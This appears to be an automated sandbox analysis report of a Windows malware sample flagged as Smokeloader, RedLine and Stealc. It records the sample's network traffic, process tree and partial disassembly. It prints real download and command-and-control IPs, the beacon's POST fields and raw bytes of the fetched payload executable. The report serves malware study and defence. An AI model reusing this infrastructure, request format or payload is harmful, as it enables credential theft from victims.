                                                                                Oct 26, 2024 19:08:25.803376913 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.803416014 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.803618908 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.846029043 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.846046925 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.846071959 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.846095085 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.846103907 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.846112013 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.846128941 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.846137047 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.846147060 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.846164942 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.846177101 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.846209049 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.846235991 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.895674944 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.895751953 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.895776987 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.895812988 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.895831108 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.895868063 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.896589041 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.896624088 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.896652937 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.896658897 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.896673918 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.896708012 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.897440910 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.897476912 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:25.897495985 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:25.897524118 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:29.063585997 CEST8049731176.113.115.37192.168.2.4
                                                                                Oct 26, 2024 19:08:29.063699007 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:08:31.546711922 CEST4973280192.168.2.462.204.41.177
                                                                                Oct 26, 2024 19:08:31.552108049 CEST804973262.204.41.177192.168.2.4
                                                                                Oct 26, 2024 19:08:31.552211046 CEST4973280192.168.2.462.204.41.177
                                                                                Oct 26, 2024 19:08:31.552400112 CEST4973280192.168.2.462.204.41.177
                                                                                Oct 26, 2024 19:08:31.557760000 CEST804973262.204.41.177192.168.2.4
                                                                                Oct 26, 2024 19:08:32.470412970 CEST804973262.204.41.177192.168.2.4
                                                                                Oct 26, 2024 19:08:32.470582962 CEST4973280192.168.2.462.204.41.177
                                                                                Oct 26, 2024 19:08:33.125067949 CEST4973280192.168.2.462.204.41.177
                                                                                Oct 26, 2024 19:08:33.130515099 CEST804973262.204.41.177192.168.2.4
                                                                                Oct 26, 2024 19:08:34.605154991 CEST804973262.204.41.177192.168.2.4
                                                                                Oct 26, 2024 19:08:34.605218887 CEST4973280192.168.2.462.204.41.177
                                                                                Oct 26, 2024 19:08:39.612977028 CEST804973262.204.41.177192.168.2.4
                                                                                Oct 26, 2024 19:08:39.613060951 CEST4973280192.168.2.462.204.41.177
                                                                                Oct 26, 2024 19:10:10.394578934 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:10:10.706887960 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:10:11.316261053 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:10:12.522746086 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:10:15.003825903 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:10:19.816376925 CEST4973180192.168.2.4176.113.115.37
                                                                                Oct 26, 2024 19:10:20.878247976 CEST4973280192.168.2.462.204.41.177
                                                                                Oct 26, 2024 19:10:29.425718069 CEST4973180192.168.2.4176.113.115.37

                                                                                UDP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 26, 2024 19:08:20.446134090 CEST5980753192.168.2.41.1.1.1
                                                                                Oct 26, 2024 19:08:20.481583118 CEST53598071.1.1.1192.168.2.4

                                                                                DNS Queries

                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Oct 26, 2024 19:08:20.446134090 CEST192.168.2.41.1.1.10x7c41Standard query (0)post-to-me.comA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Oct 26, 2024 19:08:20.481583118 CEST1.1.1.1192.168.2.40x7c41No error (0)post-to-me.com104.21.56.70A (IP address)IN (0x0001)false
                                                                                Oct 26, 2024 19:08:20.481583118 CEST1.1.1.1192.168.2.40x7c41No error (0)post-to-me.com172.67.179.207A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • post-to-me.com
                                                                                • 176.113.115.37
                                                                                • 62.204.41.177

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.449731176.113.115.37806808C:\Users\user\Desktop\TP77MvSzt2.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 26, 2024 19:08:22.565295935 CEST85OUTGET /ScreenUpdateSync.exe HTTP/1.1
                                                                                User-Agent: ShareScreen
                                                                                Host: 176.113.115.37
                                                                                Oct 26, 2024 19:08:23.474637032 CEST1236INHTTP/1.1 200 OK
                                                                                Date: Sat, 26 Oct 2024 17:08:23 GMT
                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                Last-Modified: Sat, 26 Oct 2024 17:00:01 GMT
                                                                                ETag: "62400-625642a987083"
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 402432
                                                                                Content-Type: application/x-msdos-program
                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4b fa 88 0b 0f 9b e6 58 0f 9b e6 58 0f 9b e6 58 b2 d4 70 58 0e 9b e6 58 11 c9 62 58 11 9b e6 58 11 c9 73 58 1b 9b e6 58 11 c9 65 58 64 9b e6 58 28 5d 9d 58 0a 9b e6 58 0f 9b e7 58 74 9b e6 58 11 c9 6c 58 0e 9b e6 58 11 c9 72 58 0e 9b e6 58 11 c9 77 58 0e 9b e6 58 52 69 63 68 0f 9b e6 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 bd b3 2f 66 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 a8 03 00 00 38 10 00 00 00 00 00 ea 16 00 00 00 10 00 00 00 c0 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 10 26 00 00 04 00 00 5b 38 06 00 02 00 00 81 00 00 [TRUNCATED]
                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$KXXXpXXbXXsXXeXdX(]XXXtXlXXrXXwXXRichXPEL/f8@&[8<.text `.rdata%&@@.dataxL@.rsrc@@
                                                                                Oct 26, 2024 19:08:23.474653959 CEST212INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3b 0d 04 f0 43 00 75 02 f3 c3 e9 e5 06 00 00 8b ff 55 8b ec 51 83 65 fc 00 56 8d 45 fc 50 ff 75 0c ff 75 08 e8 5c 08 00 00 8b
                                                                                Data Ascii: ;CuUQeVEPuu\u9EttM^jh Ceu;5dQw"jYeVYEEEjYUVu
                                                                                Oct 26, 2024 19:08:23.474667072 CEST1236INData Raw: a1 00 00 00 53 57 8b 3d d4 c0 43 00 83 3d ec 0a 44 00 00 75 18 e8 59 1c 00 00 6a 1e e8 a7 1a 00 00 68 ff 00 00 00 e8 e9 17 00 00 59 59 a1 54 a9 51 00 83 f8 01 75 0e 85 f6 74 04 8b c6 eb 03 33 c0 40 50 eb 1c 83 f8 03 75 0b 56 e8 53 ff ff ff 59 85
                                                                                Data Ascii: SW=C=DuYjhYYTQut3@PuVSYuuFVj5Du.j^9@Dtu7Ytu{00_[VY3^]UjjuE]U]UQSVW5HQ5
                                                                                Oct 26, 2024 19:08:23.474680901 CEST1236INData Raw: 50 ff 15 e0 c0 43 00 6a fe 5f 89 7d fc b8 4d 5a 00 00 66 39 05 00 00 40 00 75 38 a1 3c 00 40 00 81 b8 00 00 40 00 50 45 00 00 75 27 b9 0b 01 00 00 66 39 88 18 00 40 00 75 19 83 b8 74 00 40 00 0e 76 10 33 c9 39 b0 e8 00 40 00 0f 95 c1 89 4d e4 eb
                                                                                Data Ascii: PCj_}MZf9@u8<@@PEu'f9@ut@v39@Mu3CS-YujXYujGY5](3}jWYCtQ1dD1}j1Y.}j YSY;tPY.]tMjYQ
                                                                                Oct 26, 2024 19:08:23.474709034 CEST424INData Raw: ff 15 f8 c0 43 00 5d c3 6a 0c 68 a8 d8 43 00 e8 b0 0b 00 00 33 ff 47 89 7d e4 33 db 39 1d ec 0a 44 00 75 18 e8 a2 12 00 00 6a 1e e8 f0 10 00 00 68 ff 00 00 00 e8 32 0e 00 00 59 59 8b 75 08 8d 34 f5 80 f1 43 00 39 1e 74 04 8b c7 eb 6e 6a 18 e8 dd
                                                                                Data Ascii: C]jhC3G}39Dujh2YYu4C9tnjY;u3QjYY]9u,hW 2YYuWt2YQ]>WY2YEEHj(YUEV4C>uP"Yuj&Y
                                                                                Oct 26, 2024 19:08:23.474720001 CEST1236INData Raw: eb 8d 4c 02 04 f7 d3 21 5c b8 44 fe 09 75 23 8b 4d 08 21 19 eb 1c 8d 4a e0 d3 eb 8d 4c 02 04 f7 d3 21 9c b8 c4 00 00 00 fe 09 75 06 8b 4d 08 21 59 04 8b 5d 0c 8b 53 08 8b 5b 04 8b 4d fc 03 4d f4 89 5a 04 8b 55 0c 8b 5a 04 8b 52 08 89 53 08 89 4d
                                                                                Data Ascii: L!\Du#M!JL!uM!Y]S[MMZUZRSMJ?vj?Z]]+u]j?uK^;vMJM;v;t^Mq;qu; s!tDLu!M!1K!LuM!qMqINMq
                                                                                Oct 26, 2024 19:08:23.474730968 CEST1236INData Raw: 00 00 00 80 83 f9 20 73 1a d3 eb 8b 4d f8 8d 4c 01 04 f7 d3 21 5c 90 44 fe 09 75 26 8b 4d 08 21 19 eb 1f 83 c1 e0 d3 eb 8b 4d f8 8d 4c 01 04 f7 d3 21 9c 90 c4 00 00 00 fe 09 75 06 8b 4d 08 21 59 04 8b 4f 08 8b 5f 04 89 59 04 8b 4f 04 8b 7f 08 89
                                                                                Data Ascii: sML!\Du&M!ML!uM!YO_YOyM+M}}MOL1?vj?_]][Y]YKYKY;YuWLML s}uMDD }uOMYO
                                                                                Oct 26, 2024 19:08:23.474742889 CEST424INData Raw: 00 80 d3 ef 09 7b 04 8b 4d fc 8d bc 88 c4 00 00 00 8d 4e e0 be 00 00 00 80 d3 ee 09 37 8b 4d f8 85 c9 74 0b 89 0a 89 4c 11 fc eb 03 8b 4d f8 8b 75 f0 03 d1 8d 4e 01 89 0a 89 4c 32 fc 8b 75 f4 8b 0e 8d 79 01 89 3e 85 c9 75 1a 3b 1d e8 0a 44 00 75
                                                                                Data Ascii: {MN7MtLMuNL2uy>u;DuM;pQu%DMB_^[h&@d5D$l$l$+SVWC1E3PeuEEEEdMdY__^[]QUS]Vs35CW
                                                                                Oct 26, 2024 19:08:23.474761009 CEST1236INData Raw: 8b 45 f4 5f 5e 5b 8b e5 5d c3 c7 45 f4 00 00 00 00 eb c9 8b 4d 08 81 39 63 73 6d e0 75 29 83 3d 58 a9 51 00 00 74 20 68 58 a9 51 00 e8 c3 2b 00 00 83 c4 04 85 c0 74 0f 8b 55 08 6a 01 52 ff 15 58 a9 51 00 83 c4 08 8b 4d 0c e8 df 2a 00 00 8b 45 0c
                                                                                Data Ascii: E_^[]EM9csmu)=XQt hXQ+tUjRXQM*E9XthCW*EMHtN381NV3:!EHu*9SRhCW*U39EjhPPCDu]3@TQ]U
                                                                                Oct 26, 2024 19:08:23.474844933 CEST1236INData Raw: 26 68 b8 c7 43 00 68 fb 02 00 00 56 e8 8a 2d 00 00 83 c4 0c 85 c0 74 0f 33 c0 50 50 50 50 50 e8 26 15 00 00 83 c4 14 56 e8 e3 2c 00 00 40 59 83 f8 3c 76 38 56 e8 d6 2c 00 00 83 ee 3b 03 c6 6a 03 b9 3c 0e 44 00 68 b4 c7 43 00 2b c8 51 50 e8 01 2c
                                                                                Data Ascii: &hChV-t3PPPPP&V,@Y<v8V,;j<DhC+QP,t3VVVVV3hCSWg+tVVVVVE4CSWB+tVVVVVh hCW)2j|C;t$tjEP4C6!,YP6
                                                                                Oct 26, 2024 19:08:23.480191946 CEST1236INData Raw: ff 35 48 0e 44 00 e8 65 ff ff ff 59 8b f0 56 ff 35 64 f3 43 00 ff 15 28 c1 43 00 8b c6 5e c3 a1 60 f3 43 00 83 f8 ff 74 16 50 ff 35 50 0e 44 00 e8 3b ff ff ff 59 ff d0 83 0d 60 f3 43 00 ff a1 64 f3 43 00 83 f8 ff 74 0e 50 ff 15 2c c1 43 00 83 0d
                                                                                Data Ascii: 5HDeYV5dC(C^`CtP5PD;Y`CdCtP,CdCjhCCV8CuVYEuF\C3G~t$hCPChCu~pCKCFhhCjRYevhCE>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.44973262.204.41.177805440C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 26, 2024 19:08:31.552400112 CEST88OUTGET / HTTP/1.1
                                                                                Host: 62.204.41.177
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                Oct 26, 2024 19:08:32.470412970 CEST203INHTTP/1.1 200 OK
                                                                                Date: Sat, 26 Oct 2024 17:08:32 GMT
                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                Content-Length: 0
                                                                                Keep-Alive: timeout=5, max=100
                                                                                Connection: Keep-Alive
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Oct 26, 2024 19:08:33.125067949 CEST419OUTPOST /edd20096ecef326d.php HTTP/1.1
                                                                                Content-Type: multipart/form-data; boundary=----KKJKEBKFCAAECAAAAAEC
                                                                                Host: 62.204.41.177
                                                                                Content-Length: 219
                                                                                Connection: Keep-Alive
                                                                                Cache-Control: no-cache
                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 45 33 42 46 33 36 42 32 31 34 38 32 36 30 34 39 38 32 31 36 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 39 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4a 4b 45 42 4b 46 43 41 41 45 43 41 41 41 41 41 45 43 2d 2d 0d 0a
                                                                                Data Ascii: ------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="hwid"3E3BF36B21482604982160------KKJKEBKFCAAECAAAAAECContent-Disposition: form-data; name="build"default9_cap------KKJKEBKFCAAECAAAAAEC--
                                                                                Oct 26, 2024 19:08:34.605154991 CEST210INHTTP/1.1 200 OK
                                                                                Date: Sat, 26 Oct 2024 17:08:33 GMT
                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                Content-Length: 8
                                                                                Keep-Alive: timeout=5, max=99
                                                                                Connection: Keep-Alive
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Data Raw: 59 6d 78 76 59 32 73 3d
                                                                                Data Ascii: YmxvY2s=


                                                                                HTTPS Proxied Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.449730104.21.56.704436808C:\Users\user\Desktop\TP77MvSzt2.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2024-10-26 17:08:21 UTC90OUTGET /track_prt.php?sub=0&cc=DE HTTP/1.1
                                                                                User-Agent: ShareScreen
                                                                                Host: post-to-me.com
                                                                                2024-10-26 17:08:22 UTC780INHTTP/1.1 200 OK
                                                                                Date: Sat, 26 Oct 2024 17:08:22 GMT
                                                                                Content-Type: text/html
                                                                                Transfer-Encoding: chunked
                                                                                Connection: close
                                                                                X-Powered-By: PHP/5.4.16
                                                                                cf-cache-status: DYNAMIC
                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qvb9oaU7zXZG6AJDKkOofqv1Wrkc4CUA8wIDwFSlg1Lw0847vSO9VZ8VZhEuThUwhR0VoE1iONfq0qhYQT3O1RI%2B4PZ%2Fg%2Fcd%2Bf%2Fa7rwR0sRtEDZF33jb1kFv4yINQcgauw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                Server: cloudflare
                                                                                CF-RAY: 8d8c0c45bb4e6bae-DFW
                                                                                alt-svc: h3=":443"; ma=86400
                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1070&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=728&delivery_rate=2637522&cwnd=251&unsent_bytes=0&cid=1f17074025418419&ts=1233&x=0"
                                                                                2024-10-26 17:08:22 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                Data Ascii: 2ok
                                                                                2024-10-26 17:08:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                Data Ascii: 0


                                                                                Statistics

                                                                                CPU Usage

                                                                                Click to jump to process

                                                                                Memory Usage

                                                                                Click to jump to process

                                                                                High Level Behavior Distribution

                                                                                Click to dive into process behavior distribution

                                                                                Behavior

                                                                                Click to jump to process

                                                                                System Behavior

                                                                                General

                                                                                Target ID:0
                                                                                Start time:13:08:16
                                                                                Start date:26/10/2024
                                                                                Path:C:\Users\user\Desktop\TP77MvSzt2.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\TP77MvSzt2.exe"
                                                                                Imagebase:0x400000
                                                                                File size:466'944 bytes
                                                                                MD5 hash:1E1E32D1EEDB37A1E3C1AD488621B26F
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.4210942714.0000000002DA9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                Reputation:low
                                                                                Has exited:false

                                                                                General

                                                                                Target ID:1
                                                                                Start time:13:08:25
                                                                                Start date:26/10/2024
                                                                                Path:C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe"
                                                                                Imagebase:0x400000
                                                                                File size:402'432 bytes
                                                                                MD5 hash:8107C38AF897D81AA4BFE8CE9CA8407C
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2965871519.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000001.00000002.2966797377.00000000008D9000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000003.1890384473.0000000002310000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                Antivirus matches:
                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                General

                                                                                Target ID:7
                                                                                Start time:13:08:34
                                                                                Start date:26/10/2024
                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 1076
                                                                                Imagebase:0xc20000
                                                                                File size:483'680 bytes
                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Disassembly

                                                                                Reset < >

                                                                                  Execution Graph

                                                                                  Execution Coverage:2.2%
                                                                                  Dynamic/Decrypted Code Coverage:3.8%
                                                                                  Signature Coverage:5.8%
                                                                                  Total number of Nodes:738
                                                                                  Total number of Limit Nodes:21
                                                                                  execution_graph 63637 404bb3 63638 404bbf Concurrency::details::ResourceManager::SubscribeCurrentThread 63637->63638 63643 40fb31 63638->63643 63642 404bdf Concurrency::details::SchedulerProxy::Cleanup Concurrency::details::ResourceManager::SubscribeCurrentThread 63646 40fb36 63643->63646 63645 404bc8 63651 4051f5 63645->63651 63646->63645 63648 40fb52 ListArray 63646->63648 63667 42ad9e 63646->63667 63674 42f470 7 API calls 2 library calls 63646->63674 63675 42862d RaiseException 63648->63675 63650 4103ec 63652 405201 Concurrency::details::ResourceManager::SubscribeCurrentThread __Cnd_init 63651->63652 63655 405219 __Mtx_init 63652->63655 63686 40ce57 28 API calls std::_Throw_Cpp_error 63652->63686 63654 405240 63678 4010ea 63654->63678 63655->63654 63687 40ce57 28 API calls std::_Throw_Cpp_error 63655->63687 63663 40528f 63664 4052a4 Concurrency::details::SchedulerProxy::Cleanup 63663->63664 63689 401128 28 API calls std::_Cnd_waitX 63663->63689 63690 401109 63664->63690 63666 4052c9 Concurrency::details::ResourceManager::SubscribeCurrentThread 63666->63642 63672 4336c7 __Thrd_start 63667->63672 63668 433705 63677 42eae9 20 API calls _Atexit 63668->63677 63670 4336f0 RtlAllocateHeap 63671 433703 63670->63671 63670->63672 63671->63646 63672->63668 63672->63670 63676 42f470 7 API calls 2 library calls 63672->63676 63674->63646 63675->63650 63676->63672 63677->63671 63694 40d338 63678->63694 63681 401103 63683 40cf18 63681->63683 63726 42e134 63683->63726 63686->63655 63687->63654 63688 40ce57 28 API calls std::_Throw_Cpp_error 63688->63663 63689->63663 63691 401115 __Mtx_unlock 63690->63691 63692 401122 63691->63692 64058 40ce57 28 API calls std::_Throw_Cpp_error 63691->64058 63692->63666 63698 40d092 63694->63698 63697 40ce57 28 API calls std::_Throw_Cpp_error 63697->63681 63699 40d0e8 63698->63699 63700 40d0ba GetCurrentThreadId 63698->63700 63701 40d0ec GetCurrentThreadId 63699->63701 63708 40d112 63699->63708 63702 40d0e0 63700->63702 63703 40d0c5 GetCurrentThreadId 63700->63703 63712 40d0fb 63701->63712 63716 40f8f4 63702->63716 63703->63702 63704 40d1ab GetCurrentThreadId 63704->63712 63705 40d202 GetCurrentThreadId 63705->63702 63707 40d132 63723 40e954 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 63707->63723 63708->63704 63708->63707 63711 4010f6 63711->63681 63711->63697 63712->63702 63712->63705 63713 40d16a GetCurrentThreadId 63713->63712 63714 40d13d __Xtime_diff_to_millis2 63713->63714 63714->63702 63714->63712 63714->63713 63724 40e954 GetSystemTimeAsFileTime __aulldvrm __Xtime_get_ticks 63714->63724 63717 40f8fd 63716->63717 63718 40f8ff IsProcessorFeaturePresent 63716->63718 63717->63711 63720 40f972 63718->63720 63725 40f936 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 63720->63725 63722 40fa55 63722->63711 63723->63714 63724->63714 63725->63722 63727 42e141 63726->63727 63728 42e155 63726->63728 63749 42eae9 20 API calls _Atexit 63727->63749 63740 42e0eb 63728->63740 63732 42e146 63750 42a5bd 26 API calls _Deallocate 63732->63750 63733 42e16a CreateThread 63735 42e195 63733->63735 63736 42e189 GetLastError 63733->63736 63778 42dfe0 63733->63778 63752 42e05d 63735->63752 63751 42eab3 20 API calls 3 library calls 63736->63751 63737 40527c 63737->63663 63737->63688 63760 434d4a 63740->63760 63744 42e104 63745 42e123 63744->63745 63746 42e10b GetModuleHandleExW 63744->63746 63747 42e05d __Thrd_start 22 API calls 63745->63747 63746->63745 63748 42e12d 63747->63748 63748->63733 63748->63735 63749->63732 63750->63737 63751->63735 63753 42e06a 63752->63753 63754 42e08e 63752->63754 63755 42e070 CloseHandle 63753->63755 63756 42e079 63753->63756 63754->63737 63755->63756 63757 42e088 63756->63757 63758 42e07f FreeLibrary 63756->63758 63759 43348a _free 20 API calls 63757->63759 63758->63757 63759->63754 63761 434d57 63760->63761 63762 434d97 63761->63762 63763 434d82 HeapAlloc 63761->63763 63767 434d6b __Thrd_start 63761->63767 63776 42eae9 20 API calls _Atexit 63762->63776 63765 434d95 63763->63765 63763->63767 63766 42e0fb 63765->63766 63769 43348a 63766->63769 63767->63762 63767->63763 63775 42f470 7 API calls 2 library calls 63767->63775 63770 4334be _free 63769->63770 63771 433495 HeapFree 63769->63771 63770->63744 63771->63770 63772 4334aa 63771->63772 63777 42eae9 20 API calls _Atexit 63772->63777 63774 4334b0 GetLastError 63774->63770 63775->63767 63776->63766 63777->63774 63779 42dfec _Atexit 63778->63779 63780 42dff3 GetLastError ExitThread 63779->63780 63781 42e000 63779->63781 63794 431efa GetLastError 63781->63794 63783 42e005 63814 435591 63783->63814 63786 42e01b 63821 401169 63786->63821 63795 431f10 63794->63795 63796 431f16 63794->63796 63829 435131 11 API calls 2 library calls 63795->63829 63798 434d4a __Thrd_start 20 API calls 63796->63798 63800 431f65 SetLastError 63796->63800 63799 431f28 63798->63799 63801 431f30 63799->63801 63830 435187 11 API calls 2 library calls 63799->63830 63800->63783 63803 43348a _free 20 API calls 63801->63803 63805 431f36 63803->63805 63804 431f45 63804->63801 63806 431f4c 63804->63806 63808 431f71 SetLastError 63805->63808 63831 431d6c 20 API calls _Atexit 63806->63831 63832 42df9d 167 API calls 2 library calls 63808->63832 63809 431f57 63811 43348a _free 20 API calls 63809->63811 63813 431f5e 63811->63813 63812 431f7d 63813->63800 63813->63808 63815 4355b6 63814->63815 63816 4355ac 63814->63816 63833 434eb3 5 API calls 2 library calls 63815->63833 63818 40f8f4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 63816->63818 63819 42e010 63818->63819 63819->63786 63828 4354c4 10 API calls 2 library calls 63819->63828 63820 4355cd 63820->63816 63834 40155a Sleep 63821->63834 63836 405825 63821->63836 63822 401173 63825 42e1b9 63822->63825 64026 42e094 63825->64026 63827 42e1c6 63828->63786 63829->63796 63830->63804 63831->63809 63832->63812 63833->63820 63835 4016d9 63834->63835 63837 405831 Concurrency::details::ResourceManager::SubscribeCurrentThread 63836->63837 63838 4010ea std::_Cnd_initX 35 API calls 63837->63838 63839 405846 __Cnd_signal 63838->63839 63840 40585e 63839->63840 63893 40ce57 28 API 